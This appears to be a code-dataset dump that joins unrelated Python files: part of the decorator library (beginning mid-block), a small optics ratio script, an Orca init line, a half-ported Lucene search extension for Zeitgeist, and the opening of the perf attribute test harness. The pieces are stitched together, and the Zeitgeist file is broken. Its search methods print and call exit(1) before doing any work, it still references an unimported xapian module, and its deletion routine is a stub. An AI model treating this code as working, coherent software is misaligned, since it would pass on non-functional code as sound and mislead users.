from contextlib import _GeneratorContextManager
except ImportError: # Python >= 2.5
from contextlib import GeneratorContextManager as _GeneratorContextManager
class ContextManager(_GeneratorContextManager):
def __call__(self, func):
"""Context manager decorator"""
return FunctionMaker.create(
func, "with _self_: return _func_(%(shortsignature)s)",
dict(_self_=self, _func_=func), __wrapped__=func)
init = getfullargspec(_GeneratorContextManager.__init__)
n_args = len(init.args)
if n_args == 2 and not init.varargs: # (self, genobj) Python 2.7
def __init__(self, g, *a, **k):
return _GeneratorContextManager.__init__(self, g(*a, **k))
ContextManager.__init__ = __init__
elif n_args == 2 and init.varargs: # (self, gen, *a, **k) Python 3.4
pass
elif n_args == 4: # (self, gen, args, kwds) Python 3.5
def __init__(self, g, *a, **k):
return _GeneratorContextManager.__init__(self, g, a, k)
ContextManager.__init__ = __init__
contextmanager = decorator(ContextManager)
# ############################ dispatch_on ############################ #
def append(a, vancestors):
"""
Append ``a`` to the list of the virtual ancestors, unless it is already
included.
"""
add = True
for j, va in enumerate(vancestors):
if issubclass(va, a):
add = False
break
if issubclass(a, va):
vancestors[j] = a
add = False
if add:
vancestors.append(a)
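# e.g. append(bool, [int]) narrows the list to [bool] (bool subclasses int),
# while append(float, [int]) extends it to [int, float].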
# inspired from simplegeneric by P.J. Eby and functools.singledispatch
def dispatch_on(*dispatch_args):
"""
Factory of decorators turning a function into a generic function
dispatching on the given arguments.
"""
assert dispatch_args, 'No dispatch args passed'
dispatch_str = '(%s,)' % ', '.join(dispatch_args)
def check(arguments, wrong=operator.ne, msg=''):
"""Make sure one passes the expected number of arguments"""
if wrong(len(arguments), len(dispatch_args)):
raise TypeError('Expected %d arguments, got %d%s' %
(len(dispatch_args), len(arguments), msg))
def gen_func_dec(func):
"""Decorator turning a function into a generic function"""
# first check the dispatch arguments
argset = set(getfullargspec(func).args)
if not set(dispatch_args) <= argset:
raise NameError('Unknown dispatch arguments %s' % dispatch_str)
typemap = {}
def vancestors(*types):
"""
Get a list of sets of virtual ancestors for the given types
"""
check(types)
ras = [[] for _ in range(len(dispatch_args))]
for types_ in typemap:
for t, type_, ra in zip(types, types_, ras):
if issubclass(t, type_) and type_ not in t.__mro__:
append(type_, ra)
return [set(ra) for ra in ras]
def ancestors(*types):
"""
Get a list of virtual MROs, one for each type
"""
check(types)
lists = []
for t, vas in zip(types, vancestors(*types)):
n_vas = len(vas)
if n_vas > 1:
raise RuntimeError(
'Ambiguous dispatch for %s: %s' % (t, vas))
elif n_vas == 1:
va, = vas
mro = type('t', (t, va), {}).__mro__[1:]
else:
mro = t.__mro__
lists.append(mro[:-1]) # discard t and object
return lists
def register(*types):
"""
Decorator to register an implementation for the given types
"""
check(types)
def dec(f):
check(getfullargspec(f).args, operator.lt, ' in ' + f.__name__)
typemap[types] = f
return f
return dec
def dispatch_info(*types):
"""
            A utility to introspect the dispatch algorithm
"""
check(types)
lst = [tuple(a.__name__ for a in anc)
for anc in itertools.product(*ancestors(*types))]
return lst
def _dispatch(dispatch_args, *args, **kw):
types = tuple(type(arg) for arg in dispatch_args)
try: # fast path
f = typemap[types]
except KeyError:
pass
else:
return f(*args, **kw)
combinations = itertools.product(*ancestors(*types))
next(combinations) # the first one has been already tried
for types_ in combinations:
f = typemap.get(types_)
if f is not None:
return f(*args, **kw)
# else call the default implementation
return func(*args, **kw)
return FunctionMaker.create(
func, 'return _f_(%s, %%(shortsignature)s)' % dispatch_str,
dict(_f_=_dispatch), register=register, default=func,
typemap=typemap, vancestors=vancestors, ancestors=ancestors,
dispatch_info=dispatch_info, __wrapped__=func)
gen_func_dec.__name__ = 'dispatch_on' + dispatch_str
return gen_func_dec
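# Usage sketch (illustrative, mirroring the decorator package documentation):
#
#     @dispatch_on('obj')
#     def get_length(obj):
#         raise NotImplementedError(type(obj))
#
#     @get_length.register(str)
#     def get_length_str(obj):
#         return len(obj)
#
# get_length('hello') dispatches on type(obj) and returns 5; an unregistered
# type falls through to the default implementation above.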
|
JonNRb/physics506 | refs/heads/master | src/fresnel/f_ratio.py | 1 | txt = None
with open('f_data.txt') as f:
txt = f.read()
lines = [i for i in txt.split('\n') if i]
data = [[int(i.strip()) for i in j.split('\t')] for j in lines]
import math

# Convert degrees to radians.
d2r = lambda ang: ang * math.pi / 180
# Ratio of sines of the two angles (as in Snell's law: n = sin θ_1 / sin θ_2).
ratio = lambda ang_2, ang_1: math.sin(d2r(ang_1)) / math.sin(d2r(ang_2))
for point in data:
print(ratio(*point))
print('avg:', sum(ratio(*point) for point in data) / len(lines))
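# Worked check (hypothetical data row; assumes columns are
# "<refraction angle>\t<incidence angle>" in degrees): the row "19\t30"
# gives sin(30°) / sin(19°) ≈ 0.5 / 0.3256 ≈ 1.54, a plausible
# refractive-index ratio for glass against air.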
|
pvagner/orca | refs/heads/master | src/orca/scripts/apps/Banshee/__init__.py | 36 | from .script import Script
|
ustramooner/zeitgeist-lucenepp | refs/heads/clucene | _zeitgeist/engine/extensions/fts.py | 1 | # -.- coding: utf-8 -.-
# Zeitgeist
#
# Copyright © 2009 Mikkel Kamstrup Erlandsen <mikkel.kamstrup@gmail.com>
# Copyright © 2010 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# TODO
#
# - Delete events hook
# - ? Filter on StorageState
# - Throttle IO and CPU where possible
import os, sys
import time
import pickle
import dbus
import dbus.service
from xdg import BaseDirectory
from xdg.DesktopEntry import DesktopEntry, xdg_data_dirs
import logging
import subprocess
from xml.dom import minidom
import lucene
import os
from Queue import Queue, Empty
import threading
from urllib import quote as url_escape, unquote as url_unescape
import gobject, gio
from zeitgeist.datamodel import Symbol, StorageState, ResultType, TimeRange, NULL_EVENT, NEGATION_OPERATOR
from _zeitgeist.engine.datamodel import Event, Subject
from _zeitgeist.engine.extension import Extension
from _zeitgeist.engine import constants
from zeitgeist.datamodel import Interpretation, Manifestation
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger("zeitgeist.fts")
INDEX_FILE = os.path.join(constants.DATA_PATH, "fts.clucene.index")
FTS_DBUS_OBJECT_PATH = "/org/gnome/zeitgeist/index/activity"
FTS_DBUS_INTERFACE = "org.gnome.zeitgeist.Index"
FILTER_PREFIX_EVENT_INTERPRETATION = "ZGEI"
FILTER_PREFIX_EVENT_MANIFESTATION = "ZGEM"
FILTER_PREFIX_ACTOR = "ZGA"
FILTER_PREFIX_SUBJECT_URI = "ZGSU"
FILTER_PREFIX_SUBJECT_INTERPRETATION = "ZGSI"
FILTER_PREFIX_SUBJECT_MANIFESTATION = "ZGSM"
FILTER_PREFIX_SUBJECT_ORIGIN = "ZGSO"
FILTER_PREFIX_SUBJECT_MIMETYPE = "ZGST"
FILTER_PREFIX_SUBJECT_STORAGE = "ZGSS"
FILTER_PREFIX_XDG_CATEGORY = "AC"
LUCENE_FIELD_CATEGORY = "category"
LUCENE_FIELD_CONTENTS = "contents"
LUCENE_FIELD_APP = "app"
LUCENE_FIELD_TITLE = "title"
LUCENE_FIELD_NAME = "name"
LUCENE_FIELD_SITE = "site"
LUCENE_FIELD_FLAGS = "flags"
VALUE_EVENT_ID = "id"
VALUE_TIMESTAMP = "ms"
# When sorting by one of the COALESCING_RESULT_TYPES result types,
# we need to fetch some extra events from the Lucene index because
# the final result set will be coalesced on some property of the event
COALESCING_RESULT_TYPES = [ \
ResultType.MostRecentSubjects,
ResultType.LeastRecentSubjects,
ResultType.MostPopularSubjects,
ResultType.LeastPopularSubjects,
ResultType.MostRecentActor,
ResultType.LeastRecentActor,
ResultType.MostPopularActor,
ResultType.LeastPopularActor,
]
class Deletion:
"""
A marker class that marks an event id for deletion
"""
def __init__ (self, event_id):
self.event_id = event_id
class SearchEngineExtension (Extension, dbus.service.Object):
"""
Full text indexing and searching extension for Zeitgeist
"""
PUBLIC_METHODS = []
def __init__ (self, engine):
Extension.__init__(self, engine)
dbus.service.Object.__init__(self, dbus.SessionBus(),
FTS_DBUS_OBJECT_PATH)
self._indexer = Indexer(self.engine)
def pre_insert_event(self, event, sender):
		# FIXME: when Zeitgeist 0.5.1 hits the street, use post_insert_event() instead
self._indexer.index_event (event)
return event
def post_delete_events (self, ids, sender):
for _id in ids:
self._indexer.delete_event (_id)
@dbus.service.method(FTS_DBUS_INTERFACE,
in_signature="s(xx)a("+constants.SIG_EVENT+")uuu",
out_signature="a("+constants.SIG_EVENT+")u")
def Search(self, query_string, time_range, filter_templates, offset, count, result_type):
"""
DBus method to perform a full text search against the contents of the
Zeitgeist log. Returns an array of events.
"""
time_range = TimeRange(time_range[0], time_range[1])
filter_templates = map(Event, filter_templates)
events, hit_count = self._indexer.search(query_string, time_range,
filter_templates,
offset, count, result_type)
return self._make_events_sendable (events), hit_count
def _make_events_sendable(self, events):
for event in events:
if event is not None:
event._make_dbus_sendable()
return [NULL_EVENT if event is None else event for event in events]
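# Hypothetical client-side sketch (illustrative only; the bus name
# "org.gnome.zeitgeist.Engine" is an assumption, while the object path and
# interface name come from the constants above):
#
#     import dbus
#     bus = dbus.SessionBus()
#     index = bus.get_object("org.gnome.zeitgeist.Engine", FTS_DBUS_OBJECT_PATH)
#     events, count = index.Search("report", (0, 2 ** 63 - 1), [], 0, 10, 100,
#                                  dbus_interface=FTS_DBUS_INTERFACE)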
def mangle_uri (uri):
"""
Converts a URI into an index- and query friendly string. The problem
is that Xapian doesn't handle CAPITAL letters or most non-alphanumeric
symbols in a boolean term when it does prefix matching. The mangled
URIs returned from this function are suitable for boolean prefix searches.
IMPORTANT: This is a 1-way function! You can not convert back.
"""
result = ""
for c in uri.lower():
if c in (": /"):
result += "_"
else:
result += c
return result
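# Illustrative example (derived from the substitution loop above):
# mangle_uri("http://Example.com/Some File") -> "http___example.com_some_file"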
def expand_type (type_prefix, uri):
"""
Return a string with a Xapian query matching all child types of 'uri'
inside the Xapian prefix 'type_prefix'.
"""
is_negation = uri.startswith(NEGATION_OPERATOR)
uri = uri[1:] if is_negation else uri
children = Symbol.find_child_uris_extended(uri)
children = [ "%s:%s" % (type_prefix, child) for child in children ]
result = " OR ".join(children)
return result if not is_negation else "NOT (%s)" % result
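# e.g. expand_type("zgei", some_uri) yields a query of the form
# "zgei:<some_uri> OR zgei:<child_1> OR zgei:<child_2> ...", and a leading
# NEGATION_OPERATOR wraps the whole expression in "NOT (...)".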
class Indexer:
"""
Abstraction of the FT indexer and search engine
"""
def __init__ (self, engine):
self._engine = engine
log.debug("Opening full text index: %s" % INDEX_FILE)
self._analyzer = lucene.StandardAnalyzer(lucene.Version.LUCENE_CURRENT)
self._query_parser = lucene.QueryParser(lucene.Version.LUCENE_CURRENT, "defaultfield", self._analyzer)
self._directory = lucene.FSDirectory.open(INDEX_FILE)
self._maxFieldLength = 10000
self._index = lucene.IndexWriter(self._directory, self._analyzer, self._maxFieldLength)
#TODO
#self._query_parser.add_prefix("name", "N")
#self._query_parser.add_prefix("title", "N")
#self._query_parser.add_prefix("site", "S")
#self._query_parser.add_prefix("app", "A")
#self._query_parser.add_boolean_prefix("zgei", FILTER_PREFIX_EVENT_INTERPRETATION)
#self._query_parser.add_boolean_prefix("zgem", FILTER_PREFIX_EVENT_MANIFESTATION)
#self._query_parser.add_boolean_prefix("zga", FILTER_PREFIX_ACTOR)
#self._query_parser.add_boolean_prefix("zgsi", FILTER_PREFIX_SUBJECT_INTERPRETATION)
#self._query_parser.add_boolean_prefix("zgsm", FILTER_PREFIX_SUBJECT_MANIFESTATION)
#self._query_parser.add_prefix("category", FILTER_PREFIX_XDG_CATEGORY)
#self._query_parser.add_valuerangeprocessor(
# xapian.NumberValueRangeProcessor(VALUE_EVENT_ID, "id", True))
#self._query_parser.add_valuerangeprocessor(
# xapian.NumberValueRangeProcessor(VALUE_TIMESTAMP, "ms", False))
#self._query_parser.set_default_op(xapian.Query.OP_AND)
self._enquire = lucene.IndexSearcher(self._directory)
# Cache of parsed DesktopEntrys
self._desktops = {}
gobject.threads_init()
self._may_run = True
self._queue = Queue(0)
self._worker = threading.Thread(target=self._worker_thread,
name="IndexWorker")
self._worker.daemon = True
self._worker.start()
self._check_index ()
def _check_index (self):
if self._index.numDocs() == 0:
# If the index is empty we trigger a rebuild
# We must delay reindexing until after the engine is done setting up
log.info("Empty index detected. Doing full rebuild")
gobject.idle_add (self._reindex)
def _reindex (self):
"""
Index everything in the ZG log
"""
self._index.close ()
self._index = lucene.IndexWriter(self._directory, self._analyzer, self._maxFieldLength)
all_events = self._engine.find_events(TimeRange.always(),
[], StorageState.Any,
sys.maxint,
ResultType.MostRecentEvents)
log.info("Preparing to index %s events" % len(all_events))
for e in all_events : self._queue.put(e)
def index_event (self, event):
"""
		This method schedules an event for indexing. It returns immediately and
		defers the actual work to a bottom-half thread. This means that it
will not block the main loop of the Zeitgeist daemon while indexing
(which may be a heavy operation)
"""
self._queue.put (event)
return event
def delete_event (self, event_id):
"""
Remove an event from the index given its event id
"""
self._queue.put (Deletion(event_id))
return
def search (self, query_string, time_range=None, filters=None, offset=0, maxhits=10, result_type=100):
"""
Do a full text search over the indexed corpus. The `result_type`
parameter may be a zeitgeist.datamodel.ResultType or 100. In case it is
100 the textual relevancy of the search engine will be used to sort the
results. Result type 100 is the fastest (and default) mode.
The filters argument should be a list of event templates.
"""
print "search %s " % query_string
exit(1)
# Expand event template filters if necessary
if filters:
query_string = "(%s) AND (%s)" % (query_string, self._compile_event_filter_query (filters))
# Expand time range value query
if time_range and not time_range.is_always():
query_string = "(%s) AND (%s)" % (query_string, self._compile_time_range_filter_query (time_range))
# If the result type coalesces the events we need to fetch some extra
# events from the index to have a chance of actually holding 'maxhits'
# unique events
if result_type in COALESCING_RESULT_TYPES:
raw_maxhits = maxhits * 3
else:
raw_maxhits = maxhits
		# When not sorting by relevance, we fetch the results from Xapian sorted
		# by timestamp. That minimizes the skew we get from otherwise doing a
		# relevancy-ranked Xapian query and then resorting with Zeitgeist. The
# "skew" is that low-relevancy results may still have the highest timestamp
if result_type == 100:
self._enquire.set_sort_by_relevance()
else:
self._enquire.set_sort_by_value(VALUE_TIMESTAMP, True)
# Allow wildcards
query_start = time.time()
query = self._query_parser.parse_query (query_string,
self.QUERY_PARSER_FLAGS)
self._enquire.set_query (query)
hits = self._enquire.get_mset (offset, raw_maxhits)
hit_count = hits.get_matches_estimated()
log.debug("Search '%s' gave %s hits in %sms" %
(query_string, hits.get_matches_estimated(), (time.time() - query_start)*1000))
if result_type == 100:
event_ids = []
for m in hits:
event_id = int(xapian.sortable_unserialise(
m.document.get_value(VALUE_EVENT_ID)))
event_ids.append (event_id)
if event_ids:
return self._engine.get_events(ids=event_ids), hit_count
else:
return [], 0
else:
templates = []
for m in hits:
event_id = int(xapian.sortable_unserialise(
m.document.get_value(VALUE_EVENT_ID)))
ev = Event()
ev[0][Event.Id] = str(event_id)
templates.append(ev)
if templates:
return self._engine._find_events(1, TimeRange.always(),
templates,
StorageState.Any,
maxhits,
result_type), hit_count
else:
return [], 0
def _worker_thread (self):
is_dirty = False
while self._may_run:
# FIXME: Throttle IO and CPU
try:
# If we are dirty wait a while before we flush,
# or if we are clean wait indefinitely to avoid
# needless wakeups
if is_dirty:
event = self._queue.get(True, 0.5)
else:
event = self._queue.get(True)
if isinstance (event, Deletion):
self._delete_event_real (event.event_id)
else:
self._index_event_real (event)
is_dirty = True
except Empty:
if is_dirty:
# Write changes to disk
log.debug("Committing FTS index")
self._index.commit()
is_dirty = False
else:
log.debug("No changes to index. Sleeping")
def _delete_event_real (self, event_id):
"""
Look up the doc id given an event id and remove the xapian.Document
for that doc id.
Note: This is slow, but there's not much we can do about it
"""
print "TODO delete"
return
try:
_id = xapian.sortable_serialise(float(event_id))
query = xapian.Query(xapian.Query.OP_VALUE_RANGE,
VALUE_EVENT_ID, _id, _id)
self._enquire.set_query (query)
hits = self._enquire.get_mset (0, 10)
total = hits.get_matches_estimated()
if total > 1:
log.warning ("More than one event found with id '%s'" % event_id)
elif total <= 0:
log.debug ("No event for id '%s'" % event_id)
return
for m in hits:
log.debug("Deleting event '%s' with docid '%s'" %
(event_id, m.docid))
self._index.delete_document(m.docid)
except Exception, e:
log.error("Failed to delete event '%s': %s" % (event_id, e))
def _split_uri (self, uri):
"""
Returns a triple of (scheme, host, and path) extracted from `uri`
"""
i = uri.find(":")
if i == -1 :
scheme = ""
host = ""
path = uri
else:
scheme = uri[:i]
host = ""
path = ""
if uri[i+1] == "/" and uri[i+2] == "/":
j = uri.find("/", i+3)
if j == -1 :
host = uri[i+3:]
else:
host = uri[i+3:j]
path = uri[j:]
else:
host = uri[i+1:]
# Strip out URI query part
i = path.find("?")
if i != -1:
path = path[:i]
return scheme, host, path
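	# Illustrative results (derived from the branching above):
	#   _split_uri("http://example.com/a/b?q=1") -> ("http", "example.com", "/a/b")
	#   _split_uri("file:///home/u/doc.txt")     -> ("file", "", "/home/u/doc.txt")
	#   _split_uri("mailto:jane@example.com")    -> ("mailto", "jane@example.com", "")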
def _get_desktop_entry (self, app_id):
"""
		Return a xdg.DesktopEntry.DesktopEntry for `app_id`, or None in case
		no file is found for the given desktop id
"""
if app_id in self._desktops:
return self._desktops[app_id]
for datadir in xdg_data_dirs:
path = os.path.join(datadir, "applications", app_id)
if os.path.exists(path):
try:
desktop = DesktopEntry(path)
self._desktops[app_id] = desktop
return desktop
except Exception, e:
log.warning("Unable to load %s: %s" % (path, e))
return None
return None
def _index_actor (self, doc, actor):
"""
		Takes an actor as a path to a .desktop file or app:// uri
		and indexes the contents of the corresponding .desktop file
		into the given document `doc`.
"""
if not actor : return
# Get the path of the .desktop file and convert it to
# an app id (eg. 'gedit.desktop')
scheme, host, path = self._split_uri(url_unescape (actor))
if not path:
path = host
if not path :
log.debug("Unable to determine application id for %s" % actor)
return
if path.startswith("/") :
path = os.path.basename(path)
desktop = self._get_desktop_entry(path)
if desktop:
if not desktop.getNoDisplay():
f = lucene.Field(LUCENE_FIELD_APP, desktop.getName(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
f = lucene.Field(LUCENE_FIELD_APP, desktop.getGenericName(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
f = lucene.Field(LUCENE_FIELD_APP, desktop.getComment(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
for cat in desktop.getCategories():
doc.add(lucene.Field(LUCENE_FIELD_CATEGORY, cat.lower(), lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED))
else:
log.debug("Unable to look up app info for %s" % actor)
def _index_uri (self, doc, uri):
"""
		Index `uri` into the given document `doc`
"""
#TODO:
# File URIs and paths are indexed in one way, and all other,
# usually web URIs, are indexed in another way because there may
# be domain name etc. in there we want to rank differently
scheme, host, path = self._split_uri (url_unescape (uri))
if scheme == "file://" or not scheme:
path, name = os.path.split(path)
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, name, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
# Index parent names with descending weight
weight = 5
while path and name:
weight = weight / 1.5
path, name = os.path.split(path)
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(weight)
doc.add(f)
		elif scheme == "mailto":
tokens = host.split("@")
name = tokens[0]
#store as content (TODO?? why is that)
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(6)
doc.add(f)
if len(tokens) > 1:
#TODO: what's this doing???
#self._tokenizer.index_text(" ".join[1:], 1)
pass
else:
# We're cautious about indexing the path components of
# non-file URIs as some websites practice *extremely* long
# and useless URLs
path, name = os.path.split(path)
if len(name) > 30 : name = name[:30]
			if len(path) > 30 : path = path[:30]
if name:
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, name, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, name, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
if path:
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, path, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(1)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, path, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(1)
doc.add(f)
if host:
#store in name field
f = lucene.Field(LUCENE_FIELD_NAME, host, lucene.Field.STORE_YES, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
#store as content
f = lucene.Field(LUCENE_FIELD_CONTENTS, host, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
#store as site
f = lucene.Field(LUCENE_FIELD_SITE, host, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(2)
doc.add(f)
def _index_text (self, doc, text):
"""
		Index `text` as raw text data for the given document. The text is
		assumed to be a primary
description of the subject, such as the basename of a file.
Primary use is for subject.text
"""
f = lucene.Field(LUCENE_FIELD_CONTENTS, text, lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
f.setBoost(5)
doc.add(f)
def _index_contents (self, uri):
# xmlindexer doesn't extract words for URIs only for file paths
# FIXME: IONICE and NICE on xmlindexer
path = uri.replace("file://", "")
xmlindexer = subprocess.Popen(['xmlindexer', path],
stdout=subprocess.PIPE)
xml = xmlindexer.communicate()[0].strip()
xmlindexer.wait()
dom = minidom.parseString(xml)
text_nodes = dom.getElementsByTagName("text")
lines = []
if text_nodes:
for line in text_nodes[0].childNodes:
lines.append(line.data)
if lines:
f = lucene.Field(LUCENE_FIELD_CONTENTS, " ".join(lines), lucene.Field.STORE_NO, lucene.Field.INDEX_ANALYZED)
doc.add(f)
def _add_doc_filters (self, event, doc):
"""Adds the filtering rules to the doc. Filtering rules will
not affect the relevancy ranking of the event/doc"""
if event.interpretation:
doc.add(lucene.Field(FILTER_PREFIX_EVENT_INTERPRETATION, event.interpretation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if event.manifestation:
doc.add(lucene.Field(FILTER_PREFIX_EVENT_MANIFESTATION, event.manifestation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if event.actor:
doc.add(lucene.Field(FILTER_PREFIX_ACTOR, mangle_uri(event.actor), lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
for su in event.subjects:
if su.uri:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_URI, mangle_uri(su.uri), lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.interpretation:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_INTERPRETATION, su.interpretation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.manifestation:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_MANIFESTATION, su.manifestation, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.origin:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_ORIGIN, mangle_uri(su.origin), lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.mimetype:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_MIMETYPE, su.mimetype, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
if su.storage:
doc.add(lucene.Field(FILTER_PREFIX_SUBJECT_STORAGE, su.storage, lucene.Field.STORE_NO, lucene.Field.INDEX_NOT_ANALYZED_NO_NORMS))
def _index_event_real (self, event):
if not isinstance (event, Event):
log.error("Not an Event, found: %s" % type(event))
if not event.id:
log.debug("Not indexing event. Event has no id")
return
try:
doc = lucene.Document()
doc.add(lucene.NumericField(VALUE_EVENT_ID).setLongValue(int(event.id)))
doc.add(lucene.NumericField(VALUE_TIMESTAMP).setLongValue(int(event.timestamp)))
self._index_actor (doc, event.actor)
for subject in event.subjects:
if not subject.uri : continue
# By spec URIs can have arbitrary length. In reality that's just silly.
# The general online "rule" is to keep URLs less than 2k so we just
# choose to enforce that
if len(subject.uri) > 2000:
log.info ("URI too long (%s). Discarding: %s..."% (len(subject.uri), subject.uri[:30]))
continue
log.debug("Indexing '%s'" % subject.uri)
self._index_uri (doc, subject.uri)
self._index_text (doc, subject.text)
# If the subject URI is an actor, we index the .desktop also
if subject.uri.startswith ("application://"):
self._index_actor (doc, subject.uri)
# File contents indexing disabled for now...
#self._index_contents (subject.uri)
# FIXME: Possibly index payloads when we have apriori knowledge
self._add_doc_filters (event, doc)
self._index.addDocument(doc)
except Exception, e:
log.error("Error indexing event: %s" % e)
def _compile_event_filter_query (self, events):
"""Takes a list of event templates and compiles a filter query
based on their, interpretations, manifestations, and actor,
for event and subjects.
All fields within the same event will be ANDed and each template
will be ORed with the others. Like elsewhere in Zeitgeist the
type tree of the interpretations and manifestations will be expanded
to match all child symbols as well
"""
print "_compile_event_filter_query"
exit(1)
query = []
for event in events:
if not isinstance(event, Event):
raise TypeError("Expected Event. Found %s" % type(event))
tmpl = []
if event.interpretation :
tmpl.append(expand_type("zgei", event.interpretation))
if event.manifestation :
tmpl.append(expand_type("zgem", event.manifestation))
if event.actor : tmpl.append("zga:%s" % mangle_uri(event.actor))
for su in event.subjects:
if su.uri :
tmpl.append("zgsu:%s" % mangle_uri(su.uri))
if su.interpretation :
tmpl.append(expand_type("zgsi", su.interpretation))
if su.manifestation :
tmpl.append(expand_type("zgsm", su.manifestation))
if su.origin :
tmpl.append("zgso:%s" % mangle_uri(su.origin))
if su.mimetype :
tmpl.append("zgst:%s" % su.mimetype)
if su.storage :
tmpl.append("zgss:%s" % su.storage)
tmpl = "(" + ") AND (".join(tmpl) + ")"
query.append(tmpl)
return " OR ".join(query)
def _compile_time_range_filter_query (self, time_range):
"""Takes a TimeRange and compiles a range query for it"""
print "_compile_time_range_filter_query"
exit(1)
if not isinstance(time_range, TimeRange):
raise TypeError("Expected TimeRange, but found %s" % type(time_range))
return "%s..%sms" % (time_range.begin, time_range.end)
if __name__ == "__main__":
indexer = Indexer(None)
	print indexer._compile_event_filter_query([Event.new_for_values(subject_interpretation="http://www.semanticdesktop.org/ontologies/2007/03/22/nfo#Document")])
|
DrKita/cm14 | refs/heads/master | tools/perf/tests/attr.py | 3174 | #! /usr/bin/python
import os
import sys
import glob
import optparse
import tempfile
import logging
import shutil
import ConfigParser
class Fail(Exception):
def __init__(self, test, msg):
self.msg = msg
self.test = test
def getMsg(self):
return '\'%s\' - %s' % (self.test.path, self.msg)
class Unsup(Exception):
def __init__(self, test):
self.test = test
def getMsg(self):
return '\'%s\'' % self.test.path
class Event(dict):
terms = [
'cpu',
'flags',
'type',
'size',
'config',
'sample_period',
'sample_type',
'read_format',
'disabled',
'inherit',
'pinned',
'exclusive',
'exclude_user',
'exclude_kernel',
'exclude_hv',
'exclude_idle',
'mmap',
'comm',
'freq',
'inherit_stat',
'enable_on_exec',
'task',
'watermark',
'precise_ip',
'mmap_data',
'sample_id_all',
'exclude_host',
'exclude_guest',
'exclude_callchain_kernel',
'exclude_callchain_user',
'wakeup_events',
'bp_type',
'config1',
'config2',
'branch_sample_type',
'sample_regs_user',
'sample_stack_user',
]
def add(self, data):
for key, val in data:
log.debug(" %s = %s" % (key, val))
self[key] = val
def __init__(self, name, data, base):
log.debug(" Event %s" % name);
self.name = name;
self.group = ''
self.add(base)
self.add(data)
def compare_data(self, a, b):
# Allow multiple values in assignment separated by '|'
a_list = a.split('|')
b_list = b.split('|')
for a_item in a_list:
for b_item in b_list:
if (a_item == b_item):
return True
elif (a_item == '*') or (b_item == '*'):
return True
return False
def equal(self, other):
for t in Event.terms:
log.debug(" [%s] %s %s" % (t, self[t], other[t]));
if not self.has_key(t) or not other.has_key(t):
return False
if not self.compare_data(self[t], other[t]):
return False
return True
def diff(self, other):
for t in Event.terms:
if not self.has_key(t) or not other.has_key(t):
continue
if not self.compare_data(self[t], other[t]):
log.warning("expected %s=%s, got %s" % (t, self[t], other[t]))
# Test file description needs to have following sections:
# [config]
# - just single instance in file
# - needs to specify:
# 'command' - perf command name
# 'args' - special command arguments
# 'ret' - expected command return value (0 by default)
#
# [eventX:base]
# - one or multiple instances in file
# - expected values assignments
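# A hypothetical minimal test file (illustrative only):
#
#   [config]
#   command = record
#   args    = kill >/dev/null 2>&1
#   ret     = 1
#
#   [event:base-record]
#   fd = 1
#   group_fd = -1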
class Test(object):
def __init__(self, path, options):
parser = ConfigParser.SafeConfigParser()
parser.read(path)
log.warning("running '%s'" % path)
self.path = path
self.test_dir = options.test_dir
self.perf = options.perf
self.command = parser.get('config', 'command')
self.args = parser.get('config', 'args')
try:
self.ret = parser.get('config', 'ret')
except:
self.ret = 0
self.expect = {}
self.result = {}
log.debug(" loading expected events");
self.load_events(path, self.expect)
def is_event(self, name):
if name.find("event") == -1:
return False
else:
return True
